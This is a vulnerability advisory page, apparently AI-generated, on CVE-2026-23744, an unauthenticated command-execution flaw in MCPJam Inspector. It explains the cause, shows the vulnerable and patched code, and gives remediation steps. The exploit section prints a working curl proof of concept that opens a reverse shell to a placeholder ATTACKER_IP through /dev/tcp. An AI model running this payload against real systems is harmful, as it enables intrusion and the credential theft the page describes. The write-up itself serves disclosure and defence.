CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-23744

Jamming the Signal: Unauthenticated RCE in MCPJam Inspector

Alon Barad
Alon Barad
Software Engineer

Feb 17, 2026·5 min read·506 visits

Executive Summary (TL;DR)

MCPJam inspector versions <= 1.4.2 bind a debug interface to all network interfaces (0.0.0.0) by default. This interface exposes an endpoint (`/api/mcp/connect`) that accepts a command string and executes it via `child_process.spawn`. No authentication is required. This allows any attacker with network access to achieve immediate Remote Code Execution (RCE) as the user running the inspector.

Development tools are the soft underbelly of modern infrastructure. We harden our production servers, put WAFs in front of our apps, and rotate our keys, but we often leave the side door wide open on our local machines. MCPJam, a popular inspector for the Model Context Protocol (MCP), recently demonstrated exactly why this is a terrible idea. By binding a critical administrative interface to 0.0.0.0 without authentication, it allowed anyone on the network to execute arbitrary system commands. It's not a complex buffer overflow; it's a 'feature' that works too well for the wrong people.

The Hook: When Debugging Goes Wrong

The Model Context Protocol (MCP) is the new hotness for connecting Large Language Models (LLMs) to external data. It's complex, and where there is complexity, there are developers needing to debug it. Enter MCPJam Inspector, a nifty tool designed to sit between your LLM and your MCP server to visualize the traffic. It's the Wireshark of the AI agent world.

To do its job, the inspector needs to be able to start and stop MCP servers. It needs to spawn processes. In a local, isolated environment, this is fine. You trust yourself, right? But the problem arises when tools built for 'localhost' get deployed in Docker containers, cloud dev environments, or just on a laptop connected to open coffee shop Wi-Fi.

CVE-2026-23744 isn't a subtle memory corruption bug. It is a logic flaw born of convenience. The application exposes a REST API that literally says, 'Tell me what command to run, and I'll run it.' It’s the kind of vulnerability that makes exploit developers chuckle and sysadmins weep.

The Flaw: Binding to the World

The root cause is a classic 'off-by-default' security failure. In versions 1.4.2 and earlier, the MCPJam inspector binds its HTTP server to 0.0.0.0 on port 6274. For those uninitiated in the dark arts of networking, 0.0.0.0 means 'listen on every available network interface.'

Combine this promiscuous listening habit with the endpoint /api/mcp/connect. This endpoint was designed to let the frontend UI tell the backend, 'Hey, start this MCP server with these arguments.'

There is no authentication. No API key. No CSRF token. The backend code takes the JSON body—specifically the command, args, and env properties—and passes them straight into Node.js's child_process.spawn. It doesn't check if the command is an actual MCP server or netcat. It just executes. It is effectively a Remote Shell as a Service (RSaaS).

The Code: The Smoking Gun

Let's look at the Javascript that caused the panic. The vulnerable code handles the POST request by destructuring the user input and immediately using it to spawn a process. It trusts the client implicitly.

> [!NOTE] > The snippet below highlights the lack of validation in the vulnerable version.

// VULNERABLE CODE (Simplified)
app.post('/api/mcp/connect', (req, res) => {
  const { command, args, env } = req.body.serverConfig;
  
  // No Auth Check. No Input Sanitization.
  const subprocess = spawn(command, args, { env });
  
  // ... handle streams ...
});
 
// The server listens on all interfaces
app.listen(6274, '0.0.0.0');

The fix, introduced in version 1.4.3 (commit e6b9cf9), does two critical things. First, it forces the listener to 127.0.0.1. Second, it introduces a generated AUTH_TOKEN that must be present in the request headers.

// PATCHED CODE
const AUTH_TOKEN = crypto.randomBytes(32).toString('hex');
 
app.post('/api/mcp/connect', (req, res) => {
  const token = req.headers['x-mcp-token'];
  if (token !== AUTH_TOKEN) {
    return res.status(403).send('Unauthorized');
  }
  // ... safe to spawn now ...
});
 
// Restricted to localhost
app.listen(6274, '127.0.0.1');

The Exploit: One Request to Rule Them All

Exploiting this requires zero sophistication. You don't need to bypass ASLR or construct a ROP chain. You just need curl. If you can reach port 6274, you own the box.

The attack flow is linear and devastating:

Here is a functional Proof of Concept. We simply tell the inspector that our 'MCP Server' is actually the system shell, and the arguments are the commands we want to run.

curl -X POST http://TARGET_IP:6274/api/mcp/connect \
     -H "Content-Type: application/json" \
     -d '{
       "serverConfig": {
         "command": "/bin/sh",
         "args": ["-c", "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"],
         "env": {}
       },
       "serverId": "pwned"
     }'

Because the child_process.spawn function in Node.js handles the execution, standard shell redirection works if you invoke a shell binary directly. The process runs with the same privileges as the user running the MCPJam inspector—which, in developer environments, is often root (inside Docker) or the main user with sudo access.

The Impact: Why Panic?

This vulnerability scores a 9.8 Critical for a reason. In modern development workflows, tools like MCPJam are often running in the background while developers work on sensitive codebases.

Scenario 1: The Coffee Shop Attack A developer is working at a cafe. Their laptop firewall is lax. An attacker on the same Wi-Fi scans for port 6274, finds it open, and silently installs a persistent backdoor or steals SSH keys.

Scenario 2: The CI/CD Compromise MCPJam is used in a testing pipeline. An attacker who has compromised a low-value container in the same Kubernetes cluster can pivot to the CI runner via this API, stealing cloud credentials (AWS_ACCESS_KEY_ID, etc.) often exposed in environment variables.

This isn't just about crashing the app; it's about full compromise of the developer's workstation or the build environment.

The Fix: Closing the Window

The mitigation is straightforward: Update immediately.

Remediation Steps:

  1. Upgrade: Update mcpjam-inspector to version 1.4.3 or higher.
  2. Verify: Ensure the process is listening only on 127.0.0.1 using netstat -an | grep 6274.
  3. Firewall: If you must run this on a remote server, do not rely on the application's built-in security. Place it behind a reverse proxy (like Nginx) with Basic Auth, or use an SSH tunnel to access it locally.

Developers, learn this lesson: Convenience is the enemy of security. If your tool executes commands, it needs authentication. Period.

Official Patches

MCPJamOfficial patch commit

Fix Analysis (1)

Technical Appendix

CVSS Score
9.8/ 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS Probability
13.08%
Top 6% most exploited
1,500
via Shodan

Affected Systems

MCPJam Inspector <= 1.4.2DevSecOps Pipelines running vulnerable inspectorDeveloper Workstations

Affected Versions Detail

Product
Affected Versions
Fixed Version
MCPJam Inspector
MCPJam
<= 1.4.21.4.3
AttributeDetail
CWE IDCWE-306 (Missing Authentication)
Attack VectorNetwork (AV:N)
CVSS Score9.8 (Critical)
EPSS Score0.13076 (93.93%)
Exploit StatusProof of Concept (PoC) Available
ImpactRemote Code Execution (RCE)

MITRE ATT&CK Mapping

T1190Exploit Public-Facing Application
Initial Access
T1059.003Command and Scripting Interpreter: Windows Command Shell
Execution
T1059.004Command and Scripting Interpreter: Unix Shell
Execution
CWE-306
Missing Authentication for Critical Function

The software does not perform any checks for authentication for functionality that requires a verifiable user identity or consumes a significant amount of resources.

Known Exploits & Detection

GitHubPython script to automate reverse shell injection
NucleiDetection Template Available

Vulnerability Timeline

Vendor pushes fix commit (e6b9cf9)
2026-01-09
CVE-2026-23744 assigned and disclosed
2026-01-16
Public PoC released on GitHub
2026-01-20

References & Sources

  • [1]GitHub Advisory
  • [2]NVD Entry

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•about 1 hour ago•CVE-2026-48276
10.0

CVE-2026-48276: Unrestricted File Upload in Adobe ColdFusion

Adobe ColdFusion versions 2025.9 and 2023.20 and earlier are affected by an Unrestricted Upload of File with Dangerous Type vulnerability (CWE-434). An unauthenticated remote attacker can exploit this flaw to upload malicious ColdFusion Markup Language (CFML) files directly into web-accessible directories. Accessing the uploaded script triggers arbitrary code execution in the security context of the running service account.

Amit Schendel
Amit Schendel
6 views•6 min read
•about 5 hours ago•CVE-2026-46599
7.5

CVE-2026-46599: Unrestricted Memory Allocation in golang.org/x/image/tiff PackBits Decoder

CVE-2026-46599 (also identified by Go vulnerability alias GO-2026-5032) is a high-severity denial-of-service vulnerability in the Go image repository, specifically within the TIFF decoder's PackBits decompression engine. A lack of resource limits during the parsing of Run-Length Encoded PackBits streams allows an attacker to construct a crafted TIFF image that achieves significant decompression amplification. This flaw enables an unauthenticated remote attacker to exhaust system resources, leading to an Out-of-Memory crash or a prolonged application hang.

Alon Barad
Alon Barad
27 views•7 min read
•3 days ago•CVE-2026-54269
5.3

CVE-2026-54269: Runtime Property Shadowing and Denial of Service in protobufjs

A property shadowing vulnerability exists in protobufjs where schema-derived names can collide with and overwrite runtime-critical internal helper properties. This issue leads to uncaught runtime exceptions and crash-based Denial of Service.

Alon Barad
Alon Barad
11 views•6 min read
•4 days ago•CVE-2025-6965
7.7

CVE-2025-6965: Remote Code Execution via Integer Truncation in SQLite Aggregate Parser

An integer truncation vulnerability (CWE-197) exists in SQLite before version 3.50.2 during the processing of aggregate queries with more than 32,767 distinct column references. This causes an internal 32-bit counter to truncate to a signed 16-bit integer, producing negative values that cause out-of-bounds heap operations in release builds.

Amit Schendel
Amit Schendel
20 views•6 min read
•5 days ago•CVE-2026-47291
9.8

CVE-2026-47291: Remote Code Execution in Windows HTTP.sys Kernel Driver

An integer overflow vulnerability in the Windows kernel-mode HTTP driver (HTTP.sys) allows an unauthenticated remote attacker to execute arbitrary code with kernel privileges or cause a Denial of Service via a specially crafted sequence of HTTP request headers.

Amit Schendel
Amit Schendel
31 views•8 min read
•5 days ago•CVE-2026-11822
7.8

CVE-2026-11822: Memory Corruption and Buffer Overflow in SQLite FTS5 Extension

A memory corruption vulnerability exists in the FTS5 (Full-Text Search 5) extension of SQLite prior to version 3.53.2. An attacker can construct a malicious database file containing corrupt FTS5 page data. Querying this database triggers out-of-bounds reads and heap-based buffer overflows, potentially causing a crash or arbitrary code execution.

Amit Schendel
Amit Schendel
11 views•5 min read